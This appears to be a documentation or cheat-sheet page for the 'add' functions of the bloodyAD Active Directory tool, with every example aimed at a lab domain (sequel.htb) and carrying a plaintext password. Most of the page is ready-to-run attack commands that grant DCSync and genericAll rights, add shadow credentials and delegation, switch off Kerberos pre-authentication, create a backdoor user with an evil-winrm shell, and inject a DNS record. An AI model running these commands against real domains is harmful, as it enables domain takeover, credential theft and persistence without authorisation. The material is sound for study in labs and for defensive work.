Saltar a contenido

Add Examples

Add computer

Adds new computer. 

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add computer "PwnnetComputer" "PwnnetTeam"

Info

Make sure to provide the domain FQDN as domain global argument -d bloody.lab or you will run into an issue as problem 1005 (CONSTRAINT_ATT_TYPE), data 0, Att 9026b (dNSHostName)

Warning

Add computer name without trailing $ e.g. (Computer$)

Add DCSync

Adds DCSync right on domain to provided trustee (Requires to own or to have WriteDacl on domain object). 

#sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add dcsync "rose"

#SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add dcsync "S-1-5-21-548670397-972687484-3496335370-1601"

#Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add dcsync "CN=Rose Fox,CN=Users,DC=sequel,DC=htb"

Add genericAll

Gives full control to trustee on target (you must own the object or have WriteDacl). 

#sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll "CA_SVC" "ryan"

#SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll "S-1-5-21-548670397-972687484-3496335370-1607" "S-1-5-21-548670397-972687484-3496335370-1114"

#Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add genericAll "CN=Certification Authority,CN=Users,DC=sequel,DC=htb" "CN=Ryan Howard,CN=Users,DC=sequel,DC=htb"

Add groupMember

Adds a new member (user, group, computer) to group. 

#sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add groupMember "Management Department" "Rose"

#SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add groupMember "S-1-5-21-548670397-972687484-3496335370-1602" "S-1-5-21-548670397-972687484-3496335370-1601"

#Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add groupMember "CN=Management Department,CN=Users,DC=sequel,DC=htb" "CN=Rose Fox,CN=Users,DC=sequel,DC=htb"

Add RBCD

Adds Resource Based Constraint Delegation for service on target, used to impersonate a user on target with service (Requires "Write" permission on target's msDS-AllowedToActOnBehalfOfOtherIdentity and Windows Server >= 2012). 

#sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add rbcd "Rose" "Management Department"

#SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add rbcd "S-1-5-21-548670397-972687484-3496335370-1601" "S-1-5-21-548670397-972687484-3496335370-1602"

#Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add rbcd "CN=Rose Fox,CN=Users,DC=sequel,DC=htb" "CN=Management Department,CN=Users,DC=sequel,DC=htb"

Add shadowCredentials

Adds Key Credentials to target, used to impersonate target with added credentials. 

#sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add shadowCredentials "Rose"

#SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add shadowCredentials "S-1-5-21-548670397-972687484-3496335370-1601" 

#Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add shadowCredentials "CN=Rose Fox,CN=Users,DC=sequel,DC=htb"

Warning

  • DC must run at least Windows Server 2016 (msDS-KeyCredentialLink only available since 2016 AD Schema), to verify:
    • query the RootDSE of the DC get object '' and verify domainControllerFunctionality is 7 or above
    • or the nTDSDSA of the DC e.g.: get object CN=NTDS Settings,CN=ALLMIGHTY,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=bloody,DC=lab --attr msDS-Behavior-Version
  • Be in a domain where the DC has AD CS enabled or a certificate authority set up in order for the PKINIT to work

Add UAC

Adds property flags altering user/computer object behavior. 

#sAMAccountName
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add uac "Rose" -f DONT_REQ_PREAUTH

#SID (objectSid)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3' add uac "S-1-5-21-548670397-972687484-3496335370-1601" -f PASSWD_NOTREQD

#Distinguished Name (DN)
bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add uac "CN=Rose Fox,CN=Users,DC=sequel,DC=htb" -f DONT_EXPIRE_PASSWD

UserAccountControl Flags
Property Flag Description
SCRIPT The logon script will be run.
ACCOUNTDISABLE The user account is disabled.
HOMEDIR_REQUIRED The home folder is required.
PASSWD_NOTREQD No password is required.
PASSWD_CANT_CHANGE The user can't change the password. It's a permission on the user's object.
ENCRYPTED_TEXT_PASSWORD_ALLOWED The user can send an encrypted password.
TEMP_DUPLICATE_ACCOUNT It's an account for users whose primary account is in another domain. Provides access to this domain but not to trusting domains.
NORMAL_ACCOUNT It's a default account type that represents a typical user.
INTERDOMAIN_TRUST_ACCOUNT It's a permit to trust an account for a system domain that trusts other domains.
WORKSTATION_TRUST_ACCOUNT It's a computer account for a workstation or server that is a member of this domain.
SERVER_TRUST_ACCOUNT It's a computer account for a domain controller that is a member of this domain.
DONT_EXPIRE_PASSWD Represents the password, which should never expire on the account.
MNS_LOGON_ACCOUNT It's an MNS logon account.
SMARTCARD_REQUIRED Forces the user to log on using a smart card.
TRUSTED_FOR_DELEGATION Service account is trusted for Kerberos delegation.
NOT_DELEGATED The security context of the user isn't delegated to a service even if the service account is trusted for Kerberos delegation.
USE_DES_KEY_ONLY Restricts this principal to use only DES encryption types for keys.
DONT_REQUIRE_PREAUTH This account doesn't require Kerberos pre-authentication for logging on.
PASSWORD_EXPIRED The user's password has expired.
TRUSTED_TO_AUTH_FOR_DELEGATION The account is enabled for delegation, allowing it to assume a client's identity and authenticate as that user to other servers.
PARTIAL_SECRETS_ACCOUNT The account is a read-only domain controller (RODC). Removing this compromises security on the server.

Add User

Adds a new user. 

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add user "3ky" "GoPwnnetTeam"

We can continue the flow with this example. 

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add groupMember "Remote Management Users" "3ky"
evil-winrm -i 10.129.222.191 -u "3ky" -p "GoPwnnetTeam"

Add dnsRecord

This function adds a new DNS record into an AD environment. 

bloodyAD --dc-ip 10.129.222.191 --host dc01.sequel.htb -d sequel.htb -u administrator -c ":administrator.pem" add dnsRecord dc02.sequel.htb 10.10.14.206

We can add options like: 

  -h, --help            show this help message and exit
  --dnstype {A,AAAA,CNAME,MX,PTR,SRV,TXT}
                        DNS record type (default: A)
  --zone ZONE           DNS zone (default: CurrentDomain)
  --ttl TTL             DNS record TTL, time in seconds the record stays in DNS caches, must be low if you want to propagate record updates quickly
                        (default: 300)
  --preference PREFERENCE
                        DNS MX record preference, must be lower than the concurrent records to be chosen (default: 10)
  --port PORT           listening port of the service in a DNS SRV record (default: None)
  --priority PRIORITY   priority of a DNS SRV record against concurrent, must be lower to be chosen, if identical to others, highest weight will be chosen
                        (default: 10)
  --weight WEIGHT       weight of a DNS SRV record against concurrent, must be higher with the lowest priority to be chosen (default: 60)
  --forest              if set, registers dns record in forest instead of domain (default: False)